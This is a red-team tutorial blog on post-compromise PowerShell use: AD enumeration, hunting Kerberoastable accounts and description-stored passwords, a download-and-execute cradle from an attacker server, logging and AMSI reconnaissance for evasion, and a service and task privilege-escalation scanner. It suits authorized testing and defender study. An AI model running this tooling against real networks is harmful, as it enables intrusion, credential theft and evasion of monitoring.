PowerShell in Red Teaming – What I Actually Do (Not What Blogs Tell You)
I used to hate PowerShell.
Not because it’s bad — but because every blog made it feel like:
“Here are 50 commands, go learn them.”
That’s not how it works in real engagements.
When you land on a Windows machine during a test, PowerShell is not “a tool” — it’s just… there. Already installed. Trusted. Quiet.
And that makes it one of the most useful things you have.
First Time I Actually Used It Properly
I had a low-priv shell on a domain-joined machine.
Nothing special:
- no admin
- no fancy access
- just a regular user
At that point, I didn’t want to drop anything. No uploads, no suspicious binaries.
So I opened PowerShell.
powershell
That’s it. No modules, no scripts.
And I started asking simple questions.
Step 1 – What Environment Am I In?
Instead of running tools, I just queried the system.
whoami
$env:USERDOMAIN
$env:COMPUTERNAME
PowerShell makes this kind of stuff easy. Cleaner than cmd, and more flexible.
Then:
Get-ComputerInfo | Select-Object CsDomain, WindowsVersion, OsArchitecture
It's slow (it collects everything before Select-Object trims it) and needs Windows PowerShell 5.1 or later, but it's one call and nothing touches disk.
Now I know:
- domain
- OS version
- architecture
Not exciting, but important: it decides which of the later steps even apply.
Step 2 – Who Else Is Around?
This is where PowerShell starts being useful.
Get-LocalUser
Get-LocalGroupMember Administrators
Both come from the LocalAccounts module, so they need Windows 10 / Server 2016 or later.
Then I check sessions:
quser
quser only lists interactive and RDP sessions, not network logons, and some hardened builds block it for standard users.
If I see an admin session here, everything changes.
But let’s say — nothing interesting.
So I keep going.
Step 3 – Domain Enumeration Without Dropping Tools
This is where most people upload something like BloodHound.
I don’t do that immediately anymore.
PowerShell can already talk to Active Directory if the RSAT ActiveDirectory module is installed. On admin workstations and servers it often is; on a regular user's workstation it usually isn't.
Get-ADDomain
Get-ADUser -Filter * | Select-Object SamAccountName
If those work, great. Just know that -Filter * pulls every user object from the DC, which is a lot of LDAP traffic on a big domain.
If not, I fall back to .NET, which is what the AD module wraps anyway:
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).Name
No modules needed. Any authenticated domain user can read this, and the same System.DirectoryServices namespace gives you an LDAP searcher for everything else.
Step 4 – Finding Interesting Accounts
I’m not looking for all users. I’m looking for useful ones.
Service accounts (the ones with an SPN, which is the Kerberoasting shortlist):
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
krbtgt shows up here too; ignore it, and look first at accounts whose password hasn't changed in years.
Accounts with weird descriptions:
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description
Putting the condition inside -Filter makes the DC do the matching instead of pulling every user down and filtering locally.
This is the kind of thing that doesn't show up in "top 10 commands" lists, but it works surprisingly often.
People leave things in descriptions. Notes. Hints. Sometimes even passwords.
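Steps 3 and 4 above assume the AD module. Here's what I'd actually run when it isn't there. This is an added example, not code from the original post: it uses only System.DirectoryServices (the [adsisearcher] accelerator) from a plain domain user's context, with no module import and nothing written to disk. The function names, the LDAP filters and the keyword list are my own choices for illustration.

```powershell
# Added example (not from the original post): domain enumeration and account
# hunting from a low-priv domain user using only .NET/ADSI, for hosts without
# the RSAT ActiveDirectory module. Function names and filters are assumptions.

function Get-DomainContextNative {
    # The core of Get-ADDomain, via System.DirectoryServices.ActiveDirectory.
    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    [PSCustomObject]@{
        Name        = $domain.Name
        Forest      = $domain.Forest.Name
        PdcEmulator = $domain.PdcRoleOwner.Name
        DomainMode  = $domain.DomainMode
    }
}

function Search-DomainNative {
    param(
        [Parameter(Mandatory)][string]$LdapFilter,
        [string[]]$Properties = @('samaccountname'),
        [int]$PageSize = 1000
    )
    # [adsisearcher] wraps DirectorySearcher bound to the current domain's
    # default naming context, authenticating with the caller's Kerberos ticket.
    $searcher = [adsisearcher]$LdapFilter
    $searcher.PageSize = $PageSize          # server-side paging past the 1000-result cap
    $searcher.PropertiesToLoad.Clear()
    $Properties | ForEach-Object { [void]$searcher.PropertiesToLoad.Add($_) }
    $results = $searcher.FindAll()
    foreach ($result in $results) {
        $row = [ordered]@{}
        foreach ($p in $Properties) {
            # Each property is a multi-valued collection; flatten to one string.
            $row[$p] = ($result.Properties[$p] | ForEach-Object { "$_" }) -join '; '
        }
        [PSCustomObject]$row
    }
    $results.Dispose()
}

function Get-KerberoastableUsersNative {
    # Users with an SPN, minus krbtgt and disabled accounts (UAC bit 0x2),
    # filtered on the DC. pwdLastSet is converted so old passwords stand out.
    $filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)' +
              '(!(samAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    Search-DomainNative -LdapFilter $filter -Properties samaccountname, serviceprincipalname, pwdlastset |
        Select-Object samaccountname, serviceprincipalname,
            @{ n = 'pwdlastset'; e = { if ($_.pwdlastset) { [DateTime]::FromFileTimeUtc([int64]$_.pwdlastset) } } }
}

function Find-DescriptionHintsNative {
    param([string[]]$Keywords = @('pass', 'pwd', 'cred', 'temp'))
    # Build one OR'd LDAP filter so the matching happens server-side.
    $clauses = ($Keywords | ForEach-Object { "(description=*${_}*)" }) -join ''
    $filter = "(&(objectCategory=person)(objectClass=user)(|$clauses))"
    Search-DomainNative -LdapFilter $filter -Properties samaccountname, description
}

# Usage on a domain-joined host. If Get-ADDomain exists, the AD module is
# present and the one-liners above work; this path is the fallback.
if (Get-Command Get-ADDomain -ErrorAction SilentlyContinue) { 'RSAT ActiveDirectory module present.' }
Get-DomainContextNative       | Format-List
Get-KerberoastableUsersNative | Format-Table -AutoSize
Find-DescriptionHintsNative   | Format-Table -AutoSize
```

Everything here is a normal LDAP read of attributes any authenticated user can see, so on the wire it looks like the directory traffic every domain-joined box generates anyway. The one thing to watch is volume: keep the filters tight rather than pulling the whole user container and sorting it out locally.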
Step 5 – Execution Without Dropping Files
One of the biggest advantages of PowerShell is this:
You don’t need to write files to disk.
Example:
IEX (New-Object Net.WebClient).DownloadString('http://<your-server>/script.ps1')
This is old and well known, but still useful in the right situation.
But here's the thing most blogs don't say:
This is also monitored a lot. Script Block Logging records the downloaded script text as a 4104 event the moment IEX compiles it, AMSI scans that same text before it runs, and most EDRs flag the Net.WebClient download on its own.
So I don't use it blindly.
Sometimes I:
- encode payloads (knowing that -EncodedCommand is decoded before Script Block Logging and AMSI see it, so encoding hides the command from process-creation telemetry, not from PowerShell's own logging)
- split execution
- or just avoid it completely
Because PowerShell is powerful, but also watched.
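"Not blindly" means knowing what the host will record before I decide. This is an added example, not the original post's code: it reads the Group Policy registry values that turn on Script Block Logging, Module Logging and Transcription, reports the language mode, and checks whether amsi.dll is loaded in the current process. It changes nothing. The function name is mine; the registry paths are the documented policy locations.

```powershell
# Added example (not from the original post): read-only check of what this
# host will log about PowerShell activity before running anything noisy.
# Function name is an assumption; registry paths are the policy locations.

function Get-PowerShellTelemetryPosture {
    $roots = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell',
        'HKLM:\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows\PowerShell',  # 32-bit host reads the redirected hive
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'                # User Configuration policies land here
    )

    function Read-PolicyValue {
        param([string]$SubKey, [string]$Name)
        # First root that has the value wins; $null means "not set by policy",
        # which is not the same as "off": PowerShell 5+ still writes 4104
        # warning events for script blocks containing suspicious content.
        foreach ($root in $roots) {
            $v = Get-ItemProperty -Path (Join-Path $root $SubKey) -Name $Name -ErrorAction SilentlyContinue
            if ($null -ne $v) { return [int]$v.$Name }
        }
        return $null
    }

    $amsiLoaded = [bool]([System.Diagnostics.Process]::GetCurrentProcess().Modules |
                  Where-Object { $_.ModuleName -ieq 'amsi.dll' })
    $transcriptDir = foreach ($root in $roots) {
        $d = (Get-ItemProperty -Path "$root\Transcription" -Name OutputDirectory -ErrorAction SilentlyContinue).OutputDirectory
        if ($d) { $d; break }
    }

    [PSCustomObject]@{
        PSVersion             = $PSVersionTable.PSVersion.ToString()
        LanguageMode          = $ExecutionContext.SessionState.LanguageMode.ToString()
        ScriptBlockLogging    = Read-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging'
        ScriptBlockInvocation = Read-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockInvocationLogging'
        ModuleLogging         = Read-PolicyValue 'ModuleLogging' 'EnableModuleLogging'
        Transcription         = Read-PolicyValue 'Transcription' 'EnableTranscripting'
        TranscriptDir         = $transcriptDir
        AmsiLoaded            = $amsiLoaded
    }
}

Get-PowerShellTelemetryPosture | Format-List
```

How I read the result: ScriptBlockLogging = 1 means the full text of anything I IEX is going to a DC-forwarded log, so a cradle is a decision, not a reflex. AmsiLoaded is almost always true on a modern box and tells me the content will be scanned regardless of logging. And if LanguageMode comes back ConstrainedLanguage, most of the .NET calls in this post won't run either, which is worth knowing before step 3.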
Step 6 – Living Off the Land
The real strength of PowerShell is not flashy scripts.
It’s this:
You can do a lot without introducing anything new.
Examples:
Check running processes:
Get-Process
Find interesting services:
Get-Service | Where-Object {$_.Status -eq "Running"}
Get-Service only gives you name and state. The binary path and the account a service runs as come from the Win32_Service CIM class, and that is where the misconfigurations live.
Look for scheduled tasks:
Get-ScheduledTask
Every one of these can lead somewhere:
- misconfigurations
- credentials
- escalation paths
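Here's what "can lead somewhere" looks like in practice. This is an added example, not the original post's code: it takes the process/service/task idea above and turns it into actual checks, built-in cmdlets only, nothing written to disk. It reports service binaries or their directories writable by the current user, unquoted service paths with a directory I could plant a file in, and scheduled-task actions whose binary I can overwrite. The function names, the output layout and the ACL heuristic are my own.

```powershell
# Added example (not from the original post): local escalation-path checks
# using only built-in cmdlets and read-only ACL inspection. Function names,
# output layout and the write-permission heuristic are assumptions.

function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Path)
    # Heuristic, read-only: is there an Allow ACE for the current user or any
    # of its token groups (Everyone, Authenticated Users, BUILTIN\Users, ...)
    # granting WriteData/AppendData or a generic write/all right? Deny ACEs are
    # not evaluated, so a hit means "look at this", not "exploitable".
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $writeBits = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000   # WriteData, AppendData, GENERIC_WRITE, GENERIC_ALL
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # orphaned SID that cannot be resolved
        if (($mySids -contains $sid) -and (([int]$ace.FileSystemRights) -band $writeBits)) { return $true }
    }
    return $false
}

function Get-UnquotedPathPlantDirs {
    param([Parameter(Mandatory)][string]$ExePath)
    # For 'C:\Program Files\My App\svc.exe' the service controller tries
    # 'C:\Program.exe', then 'C:\Program Files\My.exe'; return each parent
    # directory the current user could drop such a file into.
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Length; $i++) {
        $dir = Split-Path -Path (($parts[0..($i - 1)]) -join ' ') -Parent
        if ($dir -and (Test-WritableByCurrentUser $dir)) { $dir }
    }
}

function Get-ServiceEscalationCandidates {
    # Win32_Service carries PathName (the real command line) and StartName
    # (the account); Get-Service exposes neither.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $cmd = [Environment]::ExpandEnvironmentVariables([string]$_.PathName)
        if (-not $cmd) { return }                        # kernel drivers have no path
        if ($cmd.StartsWith('"')) {
            $end = $cmd.IndexOf('"', 1)
            if ($end -lt 1) { return }
            $exe = $cmd.Substring(1, $end - 1)
            $plant = @()
        } else {
            $m = [regex]::Match($cmd, '^(.*?\.exe)', 'IgnoreCase')
            $exe = if ($m.Success) { $m.Groups[1].Value } else { ($cmd -split ' ')[0] }
            $plant = @(if ($exe.Contains(' ')) { Get-UnquotedPathPlantDirs $exe })
        }
        $dir = Split-Path -Path $exe -Parent
        $binWritable = Test-WritableByCurrentUser $exe
        $dirWritable = if ($dir) { Test-WritableByCurrentUser $dir } else { $false }
        if ($binWritable -or $dirWritable -or $plant.Count -gt 0) {
            [PSCustomObject]@{
                Service        = $_.Name
                RunsAs         = $_.StartName
                StartMode      = $_.StartMode
                Binary         = $exe
                BinaryWritable = $binWritable
                DirWritable    = $dirWritable
                UnquotedPlant  = ($plant -join '; ')
            }
        }
    }
}

function Get-TaskEscalationCandidates {
    # Enabled tasks whose action binary the current user can overwrite; the
    # ones that run as SYSTEM or another user are the interesting hits.
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($action in @($task.Actions)) {
            if (-not $action.Execute) { continue }       # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (Test-WritableByCurrentUser $exe) {
                [PSCustomObject]@{
                    Task   = $task.TaskPath + $task.TaskName
                    RunsAs = $task.Principal.UserId
                    Binary = $exe
                    Args   = $action.Arguments
                }
            }
        }
    }
}

Get-ServiceEscalationCandidates | Format-Table -AutoSize
Get-TaskEscalationCandidates    | Format-Table -AutoSize
```

Two caveats before trusting a hit. The ACL check is a shortlist generator, not a proof: it ignores Deny entries and inheritance quirks, so confirm with icacls or a manual look before planning anything. And an unquoted path is only useful if the service runs as a more privileged account than you and you can restart it (or wait for a reboot), so read the RunsAs and StartMode columns, not just the writable flags.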
Step 7 – Where People Go Wrong
Most beginners treat PowerShell like this:
“Cool, I can run scripts now.”
That’s not the point.
The point is:
- blending in
- using native functionality
- avoiding detection
If you drop 10 scripts in the first 5 minutes, you lose that advantage.
Real Talk – PowerShell in 2026
Let’s be honest.
PowerShell is:
- heavily logged (Script Block Logging, Module Logging, transcription) and scanned by AMSI
- monitored by EDR
- well understood by defenders
So does that make it useless?
No.
It just means:
You need to be smarter about how you use it.
How I Use It Now
Not as a “weapon”.
More like:
- reconnaissance tool
- environment probe
- quick executor
And only when needed:
- loader
- automation layer
Final Thought
PowerShell is not impressive.
It doesn’t give you instant shells or flashy exploits.
But it gives you something more valuable:
Control without noise
And in a real red team engagement, that matters more than anything.
Next time, I’ll probably go deeper into:
- bypassing logging (realistically, not YouTube-style)
- or combining PowerShell with AD enumeration + BloodHound
Because that’s where things start getting interesting.